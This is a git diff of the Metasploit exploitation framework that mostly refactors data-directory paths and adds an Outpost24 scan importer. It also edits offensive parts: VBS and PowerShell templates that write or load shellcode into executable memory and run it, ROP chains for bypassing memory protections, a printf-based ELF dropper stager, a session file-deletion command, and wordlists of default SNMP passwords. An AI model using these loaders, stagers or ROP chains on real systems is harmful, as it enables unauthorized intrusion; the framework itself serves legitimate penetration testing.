a/data/meterpreter/metsrv.x64.dll and b/data/meterpreter/metsrv.x64.dll differ diff --git a/data/meterpreter/metsrv.x86.dll b/data/meterpreter/metsrv.x86.dll index 4c4060cefa..4fcde5c904 100755 Binary files a/data/meterpreter/metsrv.x86.dll and b/data/meterpreter/metsrv.x86.dll differ diff --git a/data/meterpreter/msflinker_linux_x86.bin b/data/meterpreter/msflinker_linux_x86.bin index d2d3863f5f..b513c89892 100644 Binary files a/data/meterpreter/msflinker_linux_x86.bin and b/data/meterpreter/msflinker_linux_x86.bin differ diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll index 8e31407346..77eb2ca68b 100755 Binary files a/data/meterpreter/screenshot.x64.dll and b/data/meterpreter/screenshot.x64.dll differ diff --git a/data/meterpreter/screenshot.x86.dll b/data/meterpreter/screenshot.x86.dll index e879e968bb..171de74972 100755 Binary files a/data/meterpreter/screenshot.x86.dll and b/data/meterpreter/screenshot.x86.dll differ diff --git a/data/ropdb/hxds.xml b/data/ropdb/hxds.xml index 49c2a0a9a5..5531d05c06 100644 --- a/data/ropdb/hxds.xml +++ b/data/ropdb/hxds.xml @@ -11,7 +11,7 @@ POP EBP # RETN skip 4 bytes POP EBX # RETN - 0x00000201 + Safe size to NEG XCHG EAX, EBX # RETN NEG EAX # RETN XCHG EAX, EBX # RETN @@ -40,7 +40,7 @@ POP EBP # RETN skip 4 bytes POP EBX # RETN - 0x00000201 + Safe size to NEG XCHG EAX, EBX # RETN NEG EAX # POP ESI # RETN JUNK diff --git a/data/ropdb/java.xml b/data/ropdb/java.xml index 1985d5c4d2..3a3959ce84 100644 --- a/data/ropdb/java.xml +++ b/data/ropdb/java.xml @@ -9,7 +9,7 @@ POP EBP # RETN skip 4 bytes POP EAX # RETN - 0x00000201 + 0x00000201 NEG EAX # RETN POP EBX # RETN diff --git a/data/ropdb/msvcrt.xml b/data/ropdb/msvcrt.xml index 177767e9c0..2a5416d0c2 100644 --- a/data/ropdb/msvcrt.xml +++ b/data/ropdb/msvcrt.xml @@ -8,7 +8,7 @@ POP EAX # RETN - 0xFFFFFBFF -> ebx + 0xFFFFFBFF -> ebx NEG EAX # POP EBP # RETN JUNK POP EBX # RETN diff --git a/data/svn/auth/svn.ssl.server/19bdfeb3753b288b06b4205235b24238 b/data/svn/auth/svn.ssl.server/19bdfeb3753b288b06b4205235b24238 deleted file mode 100755 index 1bf636272d..0000000000 --- a/data/svn/auth/svn.ssl.server/19bdfeb3753b288b06b4205235b24238 +++ /dev/null @@ -1,13 +0,0 @@ -K 10 -ascii_cert -V 1844 -MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+ -K 8 -failures -V 1 -8 -K 15 -svn:realmstring -V 26 -https://metasploit.com:443 -END diff --git a/data/svn/auth/svn.ssl.server/ae6796767fe833f43e1aac5614a3f229 b/data/svn/auth/svn.ssl.server/ae6796767fe833f43e1aac5614a3f229 deleted file mode 100755 index 0a1825026f..0000000000 --- a/data/svn/auth/svn.ssl.server/ae6796767fe833f43e1aac5614a3f229 +++ /dev/null @@ -1,13 +0,0 @@ -K 10 -ascii_cert -V 1844 -MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+ -K 8 -failures -V 1 -8 -K 15 -svn:realmstring -V 30 -https://www.metasploit.com:443 -END diff --git a/data/templates/scripts/to_exe.vbs.template b/data/templates/scripts/to_exe.vbs.template index 102d2787bb..a6ee5f30bb 100644 --- a/data/templates/scripts/to_exe.vbs.template +++ b/data/templates/scripts/to_exe.vbs.template @@ -1,5 +1,5 @@ Function %{var_func}() -%{var_shellcode} + %{var_shellcode} = "%{hex_shellcode}" Dim %{var_obj} Set %{var_obj} = CreateObject("Scripting.FileSystemObject") @@ -10,9 +10,11 @@ Function %{var_func}() Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2) %{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName() %{var_obj}.CreateFolder(%{var_basedir}) - %{var_tempexe} = %{var_basedir} & "\" & "svchost.exe" + %{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}" Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false) - %{var_stream}.Write %{var_bytes} + For i = 1 to Len(%{var_shellcode}) Step 2 + %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2))) + Next %{var_stream}.Close Dim %{var_shell} Set %{var_shell} = CreateObject("Wscript.Shell") diff --git a/data/templates/scripts/to_mem_dotnet.ps1.template b/data/templates/scripts/to_mem_dotnet.ps1.template index 6185274299..3641ac94ef 100644 --- a/data/templates/scripts/to_mem_dotnet.ps1.template +++ b/data/templates/scripts/to_mem_dotnet.ps1.template @@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A $%{var_compileParams}.GenerateInMemory = $True $%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode}) -%{shellcode} +[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}") $%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite) if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return } diff --git a/data/wordlists/http_owa_common.txt b/data/wordlists/http_owa_common.txt index 86c0c93c88..1eb1de5edf 100644 --- a/data/wordlists/http_owa_common.txt +++ b/data/wordlists/http_owa_common.txt @@ -1,5 +1,6 @@ aspnet_client/ Autodiscover/ +exchange/ ecp/ EWS/ Microsoft-Server-ActiveSync/ diff --git a/data/wordlists/sap_icm_paths.txt b/data/wordlists/sap_icm_paths.txt index 903a8a1843..f35f5f718d 100755 --- a/data/wordlists/sap_icm_paths.txt +++ b/data/wordlists/sap_icm_paths.txt @@ -1,3 +1,4 @@ +/AdapterFramework/version/version.jsp /AdobeDocumentServices/Config /AdobeDocumentServices/Config?wsdl /AE/index.jsp @@ -319,6 +320,7 @@ /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory +/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP /webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp /webdynpro/dispatcher/sap.com/tc~wd~tools /webdynpro/dispatcher/sap.com/tc~wd~tools/explorer diff --git a/data/wordlists/snmp_default_pass.txt b/data/wordlists/snmp_default_pass.txt index 936da894bc..65359993d5 100755 --- a/data/wordlists/snmp_default_pass.txt +++ b/data/wordlists/snmp_default_pass.txt @@ -92,6 +92,7 @@ root router rw rwa +s!a@m#n$p%c san-fran sanfran scotty diff --git a/lib/msf/core/auxiliary/jtr.rb b/lib/msf/core/auxiliary/jtr.rb index 6b9ddb322b..c1053918eb 100644 --- a/lib/msf/core/auxiliary/jtr.rb +++ b/lib/msf/core/auxiliary/jtr.rb @@ -32,50 +32,62 @@ module Auxiliary::JohnTheRipper ) @run_path = nil - @john_path = ::File.join(Msf::Config.install_root, "data", "john") + @john_path = ::File.join(Msf::Config.data_directory, "john") autodetect_platform end + # @return [String] the run path instance variable if the platform is detectable, nil otherwise. def autodetect_platform - cpuinfo_base = ::File.join(Msf::Config.install_root, "data", "cpuinfo") return @run_path if @run_path + cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo") + if File.directory?(cpuinfo_base) + data = nil - case ::RUBY_PLATFORM - when /mingw|cygwin|mswin/ - data = `"#{cpuinfo_base}/cpuinfo.exe"` rescue nil - case data - when /sse2/ - @run_path ||= "run.win32.sse2/john.exe" - when /mmx/ - @run_path ||= "run.win32.mmx/john.exe" - else - @run_path ||= "run.win32.any/john.exe" - end - - when /x86_64-linux/ - ::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia64.bin") rescue nil - data = `#{cpuinfo_base}/cpuinfo.ia64.bin` rescue nil - case data - when /mmx/ - @run_path ||= "run.linux.x64.mmx/john" - else - @run_path ||= "run.linux.x86.any/john" - end - - when /i[\d]86-linux/ - ::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia32.bin") rescue nil - data = `#{cpuinfo_base}/cpuinfo.ia32.bin` rescue nil - case data - when /sse2/ - @run_path ||= "run.linux.x86.sse2/john" - when /mmx/ - @run_path ||= "run.linux.x86.mmx/john" - else - @run_path ||= "run.linux.x86.any/john" + case ::RUBY_PLATFORM + when /mingw|cygwin|mswin/ + fname = "#{cpuinfo_base}/cpuinfo.exe" + if File.exists?(fname) and File.executable?(fname) + data = %x{"#{fname}"} rescue nil + end + case data + when /sse2/ + @run_path ||= "run.win32.sse2/john.exe" + when /mmx/ + @run_path ||= "run.win32.mmx/john.exe" + else + @run_path ||= "run.win32.any/john.exe" + end + when /x86_64-linux/ + fname = "#{cpuinfo_base}/cpuinfo.ia64.bin" + if File.exists? fname + ::FileUtils.chmod(0755, fname) rescue nil + data = %x{"#{fname}"} rescue nil + end + case data + when /mmx/ + @run_path ||= "run.linux.x64.mmx/john" + else + @run_path ||= "run.linux.x86.any/john" + end + when /i[\d]86-linux/ + fname = "#{cpuinfo_base}/cpuinfo.ia32.bin" + if File.exists? fname + ::FileUtils.chmod(0755, fname) rescue nil + data = %x{"#{fname}"} rescue nil + end + case data + when /sse2/ + @run_path ||= "run.linux.x86.sse2/john" + when /mmx/ + @run_path ||= "run.linux.x86.mmx/john" + else + @run_path ||= "run.linux.x86.any/john" + end end end - @run_path + + return @run_path end def john_session_id diff --git a/lib/msf/core/auxiliary/mime_types.rb b/lib/msf/core/auxiliary/mime_types.rb index afebdeffc0..08a04b0189 100644 --- a/lib/msf/core/auxiliary/mime_types.rb +++ b/lib/msf/core/auxiliary/mime_types.rb @@ -23,7 +23,7 @@ module Auxiliary::MimeTypes end def mime_load_extension_map - path = File.join( Msf::Config.install_root, "data", "mime.yml") + path = File.join( Msf::Config.data_directory, "mime.yml") @extension_map = YAML.load_file(path) end diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index bce0235d93..ef92dcb7da 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -41,6 +41,7 @@ require 'rex/parser/nexpose_simple_nokogiri' require 'rex/parser/nmap_nokogiri' require 'rex/parser/openvas_nokogiri' require 'rex/parser/wapiti_nokogiri' +require 'rex/parser/outpost24_nokogiri' # Legacy XML parsers -- these will be converted some day require 'rex/parser/ip360_aspl_xml' @@ -2926,7 +2927,7 @@ class DBManager # Returns one of: :nexpose_simplexml :nexpose_rawxml :nmap_xml :openvas_xml # :nessus_xml :nessus_xml_v2 :qualys_scan_xml, :qualys_asset_xml, :msf_xml :nessus_nbe :amap_mlog # :amap_log :ip_list, :msf_zip, :libpcap, :foundstone_xml, :acunetix_xml, :appscan_xml - # :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml + # :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml, :outpost24_xml # If there is no match, an error is raised instead. def import_filetype_detect(data) @@ -3059,6 +3060,9 @@ class DBManager @import_filedata[:type] = "CI" return :ci_xml end + when "main" + @import_filedata[:type] = "Outpost24 XML" + return :outpost24_xml else # Give up if we haven't hit the root tag in the first few lines break if line_count > 10 @@ -3649,7 +3653,7 @@ class DBManager data = ::File.open(args[:filename], "rb") {|f| f.read(f.stat.size)} wspace = args[:wspace] || args['wspace'] || workspace bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] - basedir = args[:basedir] || args['basedir'] || ::File.join(Msf::Config.install_root, "data", "msf") + basedir = args[:basedir] || args['basedir'] || ::File.join(Msf::Config.data_directory, "msf") allow_yaml = false btag = nil @@ -5923,6 +5927,36 @@ class DBManager parser.parse(args[:data]) end + def import_outpost24_xml(args={}, &block) + bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] + wspace = args[:wspace] || workspace + if Rex::Parser.nokogiri_loaded + parser = "Nokogiri v#{::Nokogiri::VERSION}" + noko_args = args.dup + noko_args[:blacklist] = bl + noko_args[:wspace] = wspace + if block + yield(:parser, parser) + import_outpost24_noko_stream(noko_args) {|type, data| yield type,data} + else + import_outpost24_noko_stream(noko_args) + end + return true + else # Sorry + raise DBImportError.new("Could not import due to missing Nokogiri parser. Try 'gem install nokogiri'.") + end + end + + def import_outpost24_noko_stream(args={},&block) + if block + doc = Rex::Parser::Outpost24Document.new(args,framework.db) {|type, data| yield type,data } + else + doc = Rex::Parser::Outpost24Document.new(args,self) + end + parser = ::Nokogiri::XML::SAX::Parser.new(doc) + parser.parse(args[:data]) + end + def unserialize_object(xml_elem, allow_yaml = false) return nil unless xml_elem diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb old mode 100755 new mode 100644 diff --git a/lib/msf/core/exploit/cmdstager_debug_asm.rb b/lib/msf/core/exploit/cmdstager_debug_asm.rb index a90cb806c3..acaeed53d0 100644 --- a/lib/msf/core/exploit/cmdstager_debug_asm.rb +++ b/lib/msf/core/exploit/cmdstager_debug_asm.rb @@ -19,7 +19,7 @@ module Exploit::CmdStagerDebugAsm register_advanced_options( [ OptString.new( 'DECODERSTUB', [ true, 'The debug.exe assembly listing decoder stub to use.', - File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")]), + File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_asm")]), ], self.class) end diff --git a/lib/msf/core/exploit/cmdstager_debug_write.rb b/lib/msf/core/exploit/cmdstager_debug_write.rb index f8be9c239f..53ded3ab55 100644 --- a/lib/msf/core/exploit/cmdstager_debug_write.rb +++ b/lib/msf/core/exploit/cmdstager_debug_write.rb @@ -19,7 +19,7 @@ module Exploit::CmdStagerDebugWrite register_advanced_options( [ OptString.new( 'DECODERSTUB', [ true, 'The debug.exe file-writing decoder stub to use.', - File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")]), + File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_write")]), ], self.class) end diff --git a/lib/msf/core/exploit/cmdstager_printf.rb b/lib/msf/core/exploit/cmdstager_printf.rb new file mode 100644 index 0000000000..faad1f9d2a --- /dev/null +++ b/lib/msf/core/exploit/cmdstager_printf.rb @@ -0,0 +1,27 @@ +# -*- coding: binary -*- + +require 'msf/core/exploit/cmdstager' + +module Msf + +#### +# Allows for staging cmd to arbitrary payloads through the CmdStagerPrintf. +# +# This stager uses a POSIX-conformant printf, that supports the interpretation +# of octal escapes, to drop an ELF with the payload embedded to disk. +#### + +module Exploit::CmdStagerPrintf + + include Msf::Exploit::CmdStager + + # Initializes a CmdStagerPrintf instance for the supplied payload + # + # @param exe [String] The payload embedded into an ELF + # @return [Rex::Exploitation::CmdStagerPrintf] Stager instance + def create_stager(exe) + Rex::Exploitation::CmdStagerPrintf.new(exe) + end +end + +end diff --git a/lib/msf/core/exploit/cmdstager_vbs.rb b/lib/msf/core/exploit/cmdstager_vbs.rb index 87394a65b5..7e3d05bd71 100644 --- a/lib/msf/core/exploit/cmdstager_vbs.rb +++ b/lib/msf/core/exploit/cmdstager_vbs.rb @@ -19,7 +19,7 @@ module Exploit::CmdStagerVBS register_advanced_options( [ OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.', - File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")]), + File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")]), ], self.class) end diff --git a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb index 2cdb6ca6ad..ddedf4343e 100644 --- a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb +++ b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb @@ -19,7 +19,7 @@ module Exploit::CmdStagerVBS::ADODB register_advanced_options( [ OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.', - File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")]), + File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_adodb")]), ], self.class) end diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb index 008f5ded8f..8ce6cf1a83 100644 --- a/lib/msf/core/exploit/file_dropper.rb +++ b/lib/msf/core/exploit/file_dropper.rb @@ -47,19 +47,18 @@ module Exploit::FileDropper false end else - cmds = [ + win_cmds = [ %Q|attrib.exe -r "#{win_file}"|, - %Q|del.exe /f /q "#{win_file}"|, - %Q|rm -f "#{file}" >/dev/null|, - ] - + %Q|del.exe /f /q "#{win_file}"| + ] # We need to be platform-independent here. Since we can't be # certain that {#target} is accurate because exploits with # automatic targets frequently change it, we just go ahead and # run both a windows and a unixy command in the same line. One # of them will definitely fail and the other will probably # succeed. Doing it this way saves us an extra round-trip. - session.shell_command_token(cmds.join(" ; ")) + # Trick shared by @mihi42 + session.shell_command_token("rm -f \"#{file}\" >/dev/null ; echo ' & #{win_cmds.join(" & ")} & echo \" ' >/dev/null") print_good("Deleted #{file}") true end diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index eb0803df60..f185497061 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -3,6 +3,7 @@ require 'rex/service_manager' require 'rex/exploitation/obfuscatejs' require 'rex/exploitation/encryptjs' require 'rex/exploitation/heaplib' +require 'rex/exploitation/js' module Msf @@ -677,6 +678,14 @@ protected OptEnum.new('HTML::base64', [false, 'Enable HTML obfuscation via an embeded base64 html object (IE not supported)', 'none', ['none', 'plain', 'single_pad', 'double_pad', 'random_space_injection']]), OptInt.new('HTML::javascript::escape', [false, 'Enable HTML obfuscation via HTML escaping (number of iterations)', 0]), ], Exploit::Remote::HttpServer::HTML) + + # Cache Javascript + @cache_base64 = nil + @cache_ajax_download = nil + @cache_mstime_malloc = nil + @cache_property_spray = nil + @cache_heap_spray = nil + @cache_os_detect = nil end # @@ -708,146 +717,7 @@ protected end def js_base64 - js = <<-ENDJS - // Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html - // variable names changed to make obfuscation easier - var Base64 = { - // private property - _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", - - // private method - _utf8_encode : function ( input ){ - input = input.replace(/\\r\\n/g,"\\n"); - var utftext = ""; - var input_idx; - - for (input_idx = 0; input_idx < input.length; input_idx++) { - var chr = input.charCodeAt(input_idx); - if (chr < 128) { - utftext += String.fromCharCode(chr); - } - else if((chr > 127) && (chr < 2048)) { - utftext += String.fromCharCode((chr >> 6) | 192); - utftext += String.fromCharCode((chr & 63) | 128); - } else { - utftext += String.fromCharCode((chr >> 12) | 224); - utftext += String.fromCharCode(((chr >> 6) & 63) | 128); - utftext += String.fromCharCode((chr & 63) | 128); - } - } - - return utftext; - }, - - // public method for encoding - encode : function( input ) { - var output = ""; - var chr1, chr2, chr3, enc1, enc2, enc3, enc4; - var input_idx = 0; - - input = Base64._utf8_encode(input); - - while (input_idx < input.length) { - chr1 = input.charCodeAt( input_idx++ ); - chr2 = input.charCodeAt( input_idx++ ); - chr3 = input.charCodeAt( input_idx++ ); - - enc1 = chr1 >> 2; - enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); - enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); - enc4 = chr3 & 63; - - if (isNaN(chr2)) { - enc3 = enc4 = 64; - } else if (isNaN(chr3)) { - enc4 = 64; - } - output = output + - this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) + - this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4); - } - return output; - }, - // public method for decoding - decode : function (input) { - var output = ""; - var chr1, chr2, chr3; - var enc1, enc2, enc3, enc4; - var i = 0; - - input = input.replace(/[^A-Za-z0-9\\+\\/\\=]/g, ""); - - while (i < input.length) { - - enc1 = this._keyStr.indexOf(input.charAt(i++)); - enc2 = this._keyStr.indexOf(input.charAt(i++)); - enc3 = this._keyStr.indexOf(input.charAt(i++)); - enc4 = this._keyStr.indexOf(input.charAt(i++)); - - chr1 = (enc1 << 2) | (enc2 >> 4); - chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); - chr3 = ((enc3 & 3) << 6) | enc4; - - output = output + String.fromCharCode(chr1); - - if (enc3 != 64) { - output = output + String.fromCharCode(chr2); - } - if (enc4 != 64) { - output = output + String.fromCharCode(chr3); - } - - } - - output = Base64._utf8_decode(output); - - return output; - - }, - _utf8_decode : function (utftext) { - var string = ""; - var input_idx = 0; - var chr1 = 0; - var chr2 = 0; - var chr3 = 0; - - while ( input_idx < utftext.length ) { - - chr1 = utftext.charCodeAt(input_idx); - - if (chr1 < 128) { - string += String.fromCharCode(chr1); - input_idx++; - } - else if((chr1 > 191) && (chr1 < 224)) { - chr2 = utftext.charCodeAt(input_idx+1); - string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63)); - input_idx += 2; - } else { - chr2 = utftext.charCodeAt(input_idx+1); - chr3 = utftext.charCodeAt(input_idx+2); - string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63)); - input_idx += 3; - } - } - - return string; - } - - - }; - - ENDJS - opts = { - 'Symbols' => { - 'Variables' => %w{ Base64 encoding result _keyStr encoded_data utftext input_idx - input output chr chr1 chr2 chr3 enc1 enc2 enc3 enc4 }, - 'Methods' => %w{ _utf8_encode _utf8_decode encode decode } - } - } - js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) - - return js + @cache_base64 ||= Rex::Exploitation::Js::Utils.base64 end @@ -870,34 +740,7 @@ protected # # def js_ajax_download - %Q|function ajax_download(oArg) { - method = oArg.method; - path = oArg.path; - data = oArg.data; - - if (method == undefined) { method = "GET"; } - if (method == path) { throw "Missing parameter 'path'"; } - if (data == undefined) { data = null; } - - if (window.XMLHttpRequest) { - xmlHttp = new XMLHttpRequest(); - } - else { - xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); - } - - if (xmlHttp.overrideMimeType) { - xmlHttp.overrideMimeType("text/plain; charset=x-user-defined"); - } - - xmlHttp.open(method, path, false); - xmlHttp.send(data); - if (xmlHttp.readyState == 4 && xmlHttp.status == 200) { - return xmlHttp.responseText; - } - return null; - } - | + @cache_ajax_download ||= Rex::Exploitation::Js::Network.ajax_download end @@ -933,39 +776,7 @@ protected # # def js_mstime_malloc - %Q| - function mstime_malloc(oArg) { - shellcode = oArg.shellcode; - offset = oArg.offset; - heapBlockSize = oArg.heapBlockSize; - objId = oArg.objId; - - if (shellcode 